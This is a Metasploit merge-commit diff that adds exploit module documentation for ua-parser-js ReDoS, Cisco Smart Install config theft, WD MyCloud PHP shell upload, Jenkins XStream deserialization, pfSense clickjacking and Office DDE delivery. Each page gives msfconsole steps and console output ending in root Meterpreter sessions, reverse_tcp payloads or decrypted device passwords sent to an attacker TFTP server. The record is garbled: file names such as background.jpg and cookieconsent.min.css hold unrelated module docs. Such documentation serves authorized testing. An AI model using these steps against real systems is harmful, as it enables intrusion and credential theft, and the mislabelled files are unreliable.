Merge remote-tracking branch 'upstream/master'

Author: Tod Beardsley

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.23)
+    metasploit-framework (4.16.24)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -247,7 +247,7 @@ GEM
     rb-readline (0.5.5)
     rbnacl (4.0.2)
       ffi
-    rbnacl-libsodium (1.0.15.1)
+    rbnacl-libsodium (1.0.16)
       rbnacl (>= 3.0.1)
     recog (2.1.17)
       nokogiri

data/exploits/pfsense_clickjacking/background.jpg

@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This auxiliary module exploits a Regular Expression Denial of Service vulnerability
+in the npm module `ua-parser-js`.  Versions before 0.7.16 are vulnerable.  
+Any application that uses a vulnerable version of this module and calls the `getOS`
+or `getResult` functions will be vulnerable to this module.  An example server is provided
+below.
+
+## How to Install
+
+To install a vulnerable version of `ua-parser-js`, run:
+```
+npm i [email protected]
+```
+
+## Verification Steps
+
+Example steps in this format (is also in the PR):
+
+1. Create a new directory for test application.
+2. Copy below example server into test application directory as `server.js`.
+3. Run `npm i express` to install express in the test application directory.
+4. To test vulnerable versions of the module, run `npm i [email protected]` to install a vulnerable version of ua-parser-js.
+5. To test non-vulnerable versions of the module, run `npm i ua-parser-js` to install the latest version of ua-parser-js.
+6. Once all dependencies are installed, run the server with `node server.js`.
+7. Open up a new terminal.
+8. Start msfconsole.
+9. `use auxiliary/dos/http/ua_parser_js_redos`.
+10. `set RHOST [IP]`.
+11. `run`.
+12. In vulnerable installations, Module should have positive output and the test application should accept no further requests.
+13. In non-vulnerable installations, module should have negative output and the test application should accept further requests.
+
+## Scenarios
+
+### ua-parser-js npm module version 0.7.15
+
+Expected output for successful exploitation:
+
+```
+[*] Testing Service to make sure it is working.
+[*] Test request successful, attempting to send payload
+[*] Sending ReDoS request to 192.168.3.24:3000.
+[*] No response received from 192.168.3.24:3000, service is most likely unresponsive.
+[*] Testing for service unresponsiveness.
+[+] Service not responding.
+[*] Auxiliary module execution completed
+```
+
+### Example Vulnerable Application
+
+```
+// npm i express
+// npm i [email protected] (vulnerable)
+// npm i ua-parser-js (non-vulnerable)
+
+const express = require('express')
+const uaParser = require('ua-parser-js');
+const app = express()
+
+app.get('/', (req, res) => {
+  var parser = new uaParser(req.headers['user-agent']);
+  res.end(JSON.stringify(parser.getResult()));
+});
+
+app.listen(3000, '0.0.0.0', () => console.log('Example app listening on port 3000!'))
+```

data/exploits/pfsense_clickjacking/cookieconsent.min.css

@@ -5,13 +5,28 @@
 ## Verification Steps
 
   1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
-  2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
+  2. Do: ```set ACTION SCAN```
+  3. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
   3. Do: ```run```
   4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
 
+## Options
+
+### SLEEP
+Time to wait for connection back from target. Default is `60` seconds if using `DOWNLOAD` action
+
+### LHOST
+Address to bind to for TFTP server to accept connections if using `DOWNLOAD` action
+
+## Actions
+There are two actions, default being ```SCAN```
+
+  1. **SCAN** - Scan for Smart Install endpoints. [Default]
+  2. **DOWNLOAD** - Request devices configuration and send to our TFTP server
 
 ## Scenarios
 
+Using the default `SCAN` action
   ```
 msf auxiliary(cisco_smart_install) > run
 
@@ -28,3 +43,19 @@ msf auxiliary(cisco_smart_install) > run
 [*] Scanned 512 of 512 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
+
+Using the `DOWNLOAD` action
+
+  ```
+[*] 192.168.0.26:4786      - Starting TFTP Server...
+[+] 192.168.0.26:4786      - Fingerprinted the Cisco Smart Install protocol
+[*] 192.168.0.26:4786      - Attempting copy system:running-config tftp://192.168.0.11/kWqjngYF
+[*] 192.168.0.26:4786      - Waiting 60 seconds for configuration
+[*] 192.168.0.26:4786      - Incoming file from 192.168.0.26 - kWqjngYF (31036 bytes)
+[+] 192.168.0.26:4786      - 192.168.0.26:4786 Decrypted Enable Password: testcase
+[+] 192.168.0.26:4786      - 192.168.0.26:4786 Username 'admin' with Decrypted Password: testcase)
+[*] 192.168.0.26:4786      - Providing some time for transfers to complete...
+[*] 192.168.0.26:4786      - Shutting down the TFTP service...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

data/exploits/pfsense_clickjacking/cookieconsent.min.js

@@ -0,0 +1,40 @@
+## Description
+
+This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.
+
+## Vulnerable Application
+	
+  [Western Digital](https://www.wdc.com/) designs drives and network attached storage (NAS) devices for both consumers and businesses.
+
+  This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172 .
+
+## Verification Steps
+
+1. Do: ```use exploit/linux/http/wd_mycloud_multiupload_upload```
+2. Do: ```set RHOST [IP]```
+3. Do: ```check```
+4. It should be reported as vulnerable
+5. Do: ```run```
+6. You should get a shell
+
+## Scenarios
+
+```
+msf > use exploit/linux/http/wd_mycloud_multiupload_upload
+msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
+RHOST => 192.168.86.104
+msf exploit(wd_mycloud_multiupload_upload) > check
+[+] 192.168.86.104:80 The target is vulnerable.
+msf exploit(wd_mycloud_multiupload_upload) > run
+
+[*] Started reverse TCP handler on 192.168.86.215:4444 
+[*] Uploading PHP payload (1124 bytes) to '/var/www'.
+[+] Uploaded PHP payload successfully.
+[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
+[*] Sending stage (37543 bytes) to 192.168.86.104
+[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
+[+] Deleted .7bc5NqFMK5.php
+
+meterpreter > getuid
+Server username: root (0)
+```

documentation/modules/auxiliary/dos/http/ua_parser_js_redos.md

@@ -0,0 +1,62 @@
+Jenkins XStream Groovy classpath Deserialization Vulnerability (CVE-2016-0792)
+
+This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution. The issue affects default installations. Authentication is not required to exploit the vulnerability.
+
+## Vulnerable Application
+
+Jenkins versions < 1.650 and Jenkins LTS versions < 1.642.2
+
+Download Jenkins (Windows) < version 1.650 from here:
+http://mirrors.jenkins-ci.org/windows/
+
+Windows Installation: Double click .msi
+
+Download Jenkins LTS (Debian) < version 1.642.2 from here:
+https://pkg.jenkins.io/debian-stable/
+
+Download Jenkins (Debian) < version 1.650 from here:
+https://pkg.jenkins.io/debian/
+
+Debian Installation: `sudo dpkg --install jenkins_1.642.1_all.deb`
+
+## Options
+
+**TARGETURI**
+
+The base path to Jenkins application `/` by default
+
+**VHOST**
+
+The HTTP server virtual host. You may need to configure this as well, even though it is set as optional.
+
+**The Check Command**
+
+The `jenkins_xstream_deserialize` module comes with a check command that can attempt to check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following:
+
+Note: The check only uses `appears to be vulnerable` because it is not possible to differentiate from HTTP headers which Jenkins line (Weekly or LTS) is running.
+
+```
+set RHOST [IP]
+
+set TARGETURI [path to Jenkins]
+```
+
+```
+msf exploit(jenkins_xstream_deserialize) > check
+
+[*] 192.168.1.64:8080 The target appears to be vulnerable..
+```
+
+**Exploiting the Host**
+
+After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS.
+
+```
+msf exploit(jenkins_xstream_deserialize) > set RHOST 192.168.1.37
+RHOST => 192.168.1.37
+msf exploit(jenkins_xstream_deserialize) > set target 3
+target => 3
+msf exploit(jenkins_xstream_deserialize) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf exploit(jenkins_xstream_deserialize) > exploit
+```

documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md

@@ -0,0 +1,23 @@
+## Vulnerable Application
+
+This vulnerability affects any pfSense versions prior to 2.4.2-RELEASE.
+
+## Vulnerable Setup
+
+The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possibly the WebGUI's TLS certificate must be trusted in the browser.
+
+## Verification Steps
+
+  1. `use exploit/unix/http/pfsense_clickjacking`
+  2. `set TARGETURI https://<ip WebGUI>`
+  3. `exploit`
+  4. Browse to the URL returned by MSF
+  5. Click anywhere on the returned page
+  6. Note that a new Meterpreter sessions was started.
+
+
+## Options
+
+**TARGETURI**
+
+The base path of the WebGUI. The default base path is https://192.168.1.1/

documentation/modules/exploit/linux/http/wd_mycloud_multiupload_upload.md

@@ -0,0 +1,50 @@
+
+Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
+
+## Vulnerable Application
+All Microsoft Office versions
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/fileformat/office_dde_delivery`
+3. Do: `set PAYLOAD [PAYLOAD]`
+4. Do: `run`
+
+## Options
+### FILENAME
+Filename to output, whether injecting or generating a blank one
+
+### INJECT_PATH
+Path to filename to inject
+
+
+## Example
+
+```
+msf > use exploit/windows/fileformat/office_dde_delivery
+msf exploit(office_dde_delivery) > set FILENAME msf.rtf
+FILENAME => /home/mumbai/file.rtf
+msf exploit(office_dde_delivery) > set LHOST ens3
+LHOST => ens3
+msf exploit(office_dde_delivery) > set LPORT 35116
+LPORT => 35116
+msf exploit(office_dde_delivery) > run
+[*] Using URL: http://0.0.0.0:8080/DGADAcDZ
+[*] Local IP: http://192.1668.0.11:8080/DGADAcDZ
+[*] Server started.
+[*] Handling request for .sct from 192.168.0.24
+[*] Delivering payload to 192.168.0.24...
+[*] Sending stage (205379 bytes) to 192.168.0.24
+[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217)
+
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```